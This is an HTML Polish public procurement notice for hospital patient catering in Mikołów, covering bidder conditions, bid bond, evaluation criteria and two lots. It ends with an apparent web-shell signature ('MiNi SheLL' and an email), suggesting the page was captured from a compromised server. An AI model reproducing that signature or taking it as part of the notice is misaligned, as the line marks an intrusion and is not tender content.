3. Zgodnie z art. 22a ustawy pzp, Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt. V.2. SIWZ, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub, jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
a)	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów musi udowodnić 	Zamawiającemu, że realizując zamówienie, będzie 	dysponował niezbędnymi zasobami 	tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do 	oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 
b)	Zamawiający oceni czy udostępniane wykonawcy przez inne podmioty zdolności techniczne 	lub zawodowe lub ich sytuacja finansowa lub ekonomiczna pozwalają na wykazanie przez 	wykonawcę spełnianie warunków udziału w postępowaniu oraz bada, czy nie zachodzą 	wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt. 13-22 i 	ust. 5 pkt. 1 ustawy pzp  
c)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub 	doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli 	podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. 
d)	Z zobowiązania lub innych dokumentów potwierdzających udostępnienie zasobów przez 	inne podmioty musi bezspornie i jednoznacznie wynikać w szczególności:
	-  zakres dostępnych wykonawcy zasobów innego podmiotu,
	- sposób wykorzystania zasobów innego podmiotu przez wykonawcę, przy wykonywaniu 	zamówienia
	- zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
	- czy podmiot, na zdolności którego Wykonawca polega w odniesieniu do warunków 	udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub 	doświadczenia, zrealizuje usługi których wskazane zdolności dotyczą
e)	Jeżeli zdolności techniczne lub zawodowe lub sytuacja ekonomiczna lub finansowa innego 	podmiotu, nie potwierdzają spełnienia warunków udziału w postępowaniu lub zachodzą 	wobec tych podmiotów podstawy wykluczenia Zamawiający żąda, aby wykonawca w 	terminie określonym przez Zamawiającego:
	-  zastąpił ten podmiot innym podmiotem lub
	- zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże 	zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną
f)	Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, 	odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za 	szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, 	chyba że za nieudostępnienie zasobów nie ponosi winy. 
	
4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki udziału w postępowaniu muszą zostać spełnione łącznie.
Zamawiający wykluczy z postępowania Wykonawców, którzy:
a) 	nie wykazali spełniania warunków udziału w postępowaniu, o których mowa w pkt. V.2. 	SIWZ
b) 	nie wykażą, że nie zachodzą wobec nich przesłanki wykluczenia określone w art. 24 ust. 1 	pkt 13-23 ustawy pzp
c) 	wobec których zachodzi przesłanka wykluczenia określona w art. 24 ust. 5 pkt. 1 ustawy 	pzp
- Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, a jego upoważnienie musi być udokumentowane pełnomocnictwem/upoważnieniem podpisanym przez pełnomocnych przedstawicieli wszystkich Wykonawców występujących wspólnie.
- Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy 
- oferta winna być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie
- Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana jako najkorzystniejsza, Zamawiający zastrzega sobie prawo do żądania przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wadium wnosi się przez upływem terminu składania ofert
1. Warunkiem przystąpienia do postępowania przetargowego jest skuteczne wniesienie wadium 
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
		a. w pieniądzu, 
		b. w poręczeniach bankowych lub poręczeniach spółdzielczej kasy 				oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze 			poręczeniem pieniężnym  
		c. w gwarancjach bankowych, 
		d. w gwarancjach ubezpieczeniowych,
		e. w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 		pkt. 2 	ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju 		Przedsiębiorczości (Dz.U.z 2007r. Nr 42, poz. 275 z późn. zm.)
w wysokości : 15 000,00 zł
słownie: piętnaście tysięcy  złotych 00/100

Wadium  wnoszone w formie pieniężnej wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego:
					PKO BP SA TYCHY
				59 1020 2528 0000 0002 0269 3463   		 
Za skutecznie wniesione wadium w pieniądzu uważa się wadium które znajdzie się tj. zostanie zaksięgowane na rachunku Zamawiającego do dnia 5-12-2016r do godziny 10:00
Do oferty należy dołączyć kopię potwierdzenia przelewu 

Pozostałe formy wadium należy złożyć w oryginale do depozytu w Dziale Księgowości Centrum Zdrowia w Mikołowie Sp. z o.o. przy ul. Waryńskiego 2 do dnia 5-12-2016r do godz. 10:00        
Do oferty należy dołączyć kopię pozostałych form wadium

W przypadku wniesienia wadium w w innej formie niż pieniądz w dokumencie wadialnym musi znaleźć się zapis, iż jest ono nieodwołalne, bezwarunkowe i płatne na pierwsze żądanie Zamawiającego, nie mogą być zawarte jakiekolwiek warunki ograniczające zakres odpowiedzialności gwarancyjnej. Dokument wadialny musi obejmować wszystkie przypadki opisane w art. 46 ust. 4a i ust. 5 ustawy pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>jakość usługi</td><td>20</td></tr><tr><td>wsad do kotła</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Dostawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te dotyczą:
a)obniżenia cen w stosunku do cen oferowanych przez Wykonawcę
b)ustawowej zmiany stawki podatku od towarów i usług, z zastrzeżeniem, że wynagrodzenie netto pozostanie w wysokości określonej w formularzu ofertowym. Zmiana ceny w tym zakresie nastąpi z dniem wejścia w życie odpowiednich aktów prawnych w drodze 	obustronnie podpisanego aneksu
c)możliwości niepełnej realizacji zamówienia, poprzez brak złożenia zamówienia 	w ilości określonej w formularzu ofertowym, w  przypadku zmniejszonego 	zapotrzebowania Zamawiającego, czego nie można przewidzieć na dzień podpisania umowy. Z tego faktu Wykonawca nie będzie wywodził żadnych roszczeń wobec Zamawiającego<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Pakiet nr 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Pakiet nr 1 
1. sporządzanie w kuchni Wykonawcy całodziennego wyżywienia dla pacjentów Szpitala Powiatowego w Mikołowie przy ul. Waryńskiego 2 oraz dla pacjentów Zakładu Pielęgnacyjno - Opiekuńczego (ZPO) w Łaziskach Średnich przy ul. Staszica 4 
2. dostawa posiłków do Działu Żywienia w szpitalu i punktu odbioru posiłków w ZPO  środkami transportu Wykonawcy (jednym bądź dwoma samochodami)
3. rozładowanie pojemników z posiłkami  z samochodu i przewiezienie wózkiem Wykonawcy na wskazane miejsce
4. odbiór pustych pojemników po posiłkach i ich mycie oraz dezynfekcja w pomieszczeniach Wykonawcy<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>55321000-6, 55322000-3,
                    55520000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>jakość usługi</td><td>20</td></tr><tr><td>wsad do kotła</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Pakiet nr 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Pakiet nr 2 
Przygotowanie i dostawa śniadań (ok. 10 śniadań w całym okresie obowiązywania umowy) zgodnie z opisem w załączniku nr 1 pkt. II<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>55321000-6, 55322000-3,
                    55520000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>jakość usługi</td><td>20</td></tr><tr><td>wsad do kotła</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com